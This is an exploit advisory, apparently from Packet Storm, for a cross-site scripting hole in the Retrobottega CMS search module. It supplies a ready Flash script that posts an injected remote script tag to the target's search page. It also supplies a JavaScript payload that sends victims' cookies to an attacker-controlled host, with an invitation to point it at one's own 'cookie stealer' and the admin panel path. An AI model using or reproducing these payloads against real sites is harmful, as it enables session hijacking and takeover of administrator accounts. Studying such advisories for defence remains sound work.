Retrobottega CMS is susceptible to a cross site scripting vulnerability.
67ed5432d7879f49852a86ef1a043c16de52d16eedef3128fdf7e87956ed276c----------------------------------------------------------------------------------
| ___. .__.__ .__ __ __ |
| ____ ___.__.\_ |__ ___________ _____ |__| | |__|/ |______ _____/ |_ |
|_/ ___< | | | __ \_/ __ \_ __ \/ \| | | | \ __\__ \ / \ __\ |
|\ \___\___ | | \_\ \ ___/| | \/ Y Y \ | |_| || | / __ \| | \ | |
| \___ > ____| |___ /\___ >__| |__|_| /__|____/__||__| (____ /___| /__| |
| \/\/ \/ \/ \/ \/ \/ |
| |
---------------------------------------------------------------------------------
Author: cybermilitant
Site: www.hacktime.org
Vendor's site: www.ilretrobottega.net
E-Mail: cybermilitant.ht@gmail.com
Vulnerability: Cross Site Sctipting (XXS)
Description: Retrobottega cms is suschettible of a cross site scripting vulnerability. The search's module is vulnerable and you can inject a simple javascript for execute xss's attacks. You should only edit the script for redirecting on yours cookie stealer.
--->Thanks to: nexen<---
Flash script:
-------------------------------------------------------------------
var target:String = "art";
var lang:String = " it";
var nome_pagina:String = "RISULTATI_RICERCA";
var testo_da_ricercare:String = "<script src="https://[MYSITE]/documents.js"</script> ";
var invia:String = "CERCA nel sito";
getURL("[TARGET]/trovato.php", "_self", "POST");
-------------------------------------------------------------------
documents.js
-------------------------------------------------------------------
document.location='https://[MYSITE]/documents.php?c='+escape(document.cookie);
-------------------------------------------------------------------
In the end the classical cookie grabber...
the admininstrator board is here: https://[TARGET]/gestione/index.php
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed